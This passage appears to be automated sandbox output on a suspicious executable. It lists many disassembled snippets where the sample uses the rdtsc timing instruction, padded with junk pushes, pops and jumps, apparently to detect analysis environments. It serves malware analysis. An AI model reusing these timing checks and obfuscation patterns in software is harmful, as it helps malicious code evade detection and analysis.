Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A4CF02 second address: A4CF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A4CF08 second address: A4CF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A4B0C7 second address: A4B0D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0366B second address: A0366F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9FE6FC second address: 9FE702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9FE702 second address: 9FE706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A564EC second address: A564F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A4F7AE second address: A4F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3838D0CF4Dh 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A57599 second address: A5759F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A5D6C9 second address: A5D6EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3838D0CF59h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A5D6EC second address: A5D6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A60397 second address: A6039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6039B second address: A6039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6039F second address: A603CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3838D0CF46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3838D0CF58h 0x00000013 jp 00007F3838D0CF46h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F2B45 second address: 9F2B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F3838E06D16h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A65E0D second address: A65E17 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3838D0CF4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A65E17 second address: A65E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6952C second address: A69585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jl 00007F3838D0CF5Ah 0x00000015 push ecx 0x00000016 jno 00007F3838D0CF46h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3838D0CF4Eh 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A69585 second address: A695A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A695A2 second address: A695D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3838D0CF56h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A696C2 second address: A696CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A696CB second address: A696CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A696CF second address: A696FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3838E06D28h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A696FC second address: A69702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A69702 second address: A69706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A69706 second address: A6972A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jg 00007F3838D0CF51h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6972A second address: A6973B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6973B second address: A6974B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6974B second address: A69750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6E31F second address: A6E32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9FCC97 second address: 9FCCB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838E06D28h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9FCCB3 second address: 9FCCB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9FCCB7 second address: 9FCCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3838E06D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9FCCC9 second address: 9FCCCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6D09F second address: A6D0AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F3838E06D16h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6D0AF second address: A6D0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6D0B3 second address: A6D0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A6E056 second address: A6E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A752F9 second address: A75301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A75301 second address: A75306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A75945 second address: A75949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A42514 second address: A42518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A42518 second address: A4253B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 jo 00007F3838E06D16h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3838E06D21h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A22CC5 second address: A22CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A764F3 second address: A764F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A764F7 second address: A76501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A76501 second address: A7650B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3838E06D16h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7650B second address: A76511 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7ADFF second address: A7AE09 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3838E06D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7AE09 second address: A7AE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F3838D0CF4Eh 0x0000000d jmp 00007F3838D0CF51h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7AF76 second address: A7AFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F3838E06D20h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3838E06D1Bh 0x00000013 jmp 00007F3838E06D1Ch 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7BA87 second address: A7BA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7BA8D second address: A7BAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3838E06D22h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7BDB6 second address: A7BDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7BDBA second address: A7BDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3838E06D24h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 jc 00007F3838E06D16h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7BDE3 second address: A7BDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A7BDE9 second address: A7BE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3838E06D16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3838E06D1Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A85655 second address: A85670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A85670 second address: A85675 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A85675 second address: A8567B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A84574 second address: A84591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D24h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3B8BE second address: A3B8C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3B8C2 second address: A3B8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F3838E06D27h 0x0000000e jmp 00007F3838E06D21h 0x00000013 jbe 00007F3838E06D1Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3B988 second address: A3B992 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3B992 second address: A3B9DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3838E06D24h 0x00000008 jmp 00007F3838E06D1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 6E1FD276h 0x00000016 mov dword ptr [ebp+122D2AA0h], ecx 0x0000001c push 922B833Ah 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007F3838E06D21h 0x00000028 jl 00007F3838E06D16h 0x0000002e popad 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BB4D second address: A3BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, esi 0x00000006 mov dword ptr [ebp+1245560Bh], ebx 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BB5F second address: A3BB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3838E06D16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BB6A second address: A3BB70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BB70 second address: A3BB87 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F3838E06D18h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BB87 second address: A3BB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F3838D0CF46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BC6D second address: A3BCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jg 00007F3838E06D18h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 je 00007F3838E06D30h 0x0000001d push ecx 0x0000001e jmp 00007F3838E06D28h 0x00000023 pop ecx 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007F3838E06D1Dh 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jo 00007F3838E06D1Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BCC1 second address: A3BCC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3BE83 second address: A3BE94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F3838E06D1Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3C6FD second address: A3C77F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3838D0CF57h 0x0000000e popad 0x0000000f nop 0x00000010 or dword ptr [ebp+122D2454h], ecx 0x00000016 lea eax, dword ptr [ebp+124881C4h] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F3838D0CF48h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D3BCDh], ecx 0x0000003d mov cx, ax 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F3838D0CF54h 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3C77F second address: A3C785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3C785 second address: A3C810 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3838D0CF48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F3838D0CF48h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 adc ecx, 2A0595B0h 0x0000002d mov dword ptr [ebp+122D3BC5h], edi 0x00000033 lea eax, dword ptr [ebp+12488180h] 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F3838D0CF48h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 nop 0x00000054 push edx 0x00000055 jmp 00007F3838D0CF50h 0x0000005a pop edx 0x0000005b push eax 0x0000005c pushad 0x0000005d jmp 00007F3838D0CF4Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 push edi 0x00000065 pop edi 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3C810 second address: A22CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D1DE3h] 0x0000000e call dword ptr [ebp+122D3B48h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A84CBB second address: A84CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A84CC2 second address: A84CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A87986 second address: A8798A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8798A second address: A87992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A87992 second address: A87999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A89EF1 second address: A89EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
